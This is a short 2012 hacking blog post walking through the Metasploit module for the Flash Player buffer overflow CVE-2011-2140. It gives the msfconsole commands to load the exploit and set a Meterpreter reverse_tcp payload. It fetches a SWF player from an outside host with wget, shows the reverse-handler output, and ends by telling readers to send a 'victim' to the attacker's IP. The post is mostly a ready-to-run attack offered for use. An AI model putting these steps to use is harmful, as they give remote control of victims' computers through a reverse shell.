[CVE-2011-2140 && Metasploit]Remote code Execution Flash Player
New module added to metasploit :D that exploits bugs in a further Flash Player.
Vulnerability indicated by the CVE-2011-2140, Here are the details:
Adobe Flash Player before 10.3.183.5 on Windows, Mac OS X, Linux, and Solaris and before 10.3.186.3 on Android, and Adobe AIR before 2.7.1 on Windows and Mac OS X and before 2.7.1.1961 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-2135, CVE-2011-2417, and CVE-2011-2425.
Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
Let's see how to use Metasploit :D
The first thing to do is update Metasploit:
sudo msfupdate
Now we start Metasploit:
sudo msfconsole
We use the exploit:
use exploit/windows/browser/adobe_flash_sps
Commands are always those :D
We set the payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Configure the payload:
set LHOST MY_IP
Configure the exploit:
set URIPATH /
Now we set the player SWF, I took from the poc abysssec:
wget http://www.clshack.it/nopaste/mediaplayer.swf
set SWF_PLAYER_URI mediaplayer.swf
We start the exploit:
msf exploit(adobe_flash_sps) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.190:4444
[*] Using URL: http://0.0.0.0:8080/J1YpA0
[*] Local IP: http://192.168.1.190:8080/J1YpA0
[*] Server started.
msf exploit(adobe_flash_sps) >
Have fun :D
We send our victim on our ip:PORT , e TREE :D
Related posts:
- [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- [CVE:2011-4862] Remote Root FreeBSD
- [CVE-2011-3544]Metasploit: Java Remote untrusted Java Web Start
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
This entry was posted on Friday, February 10th, 2012 at 9:39 am and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: attack • client • metasploit • remote






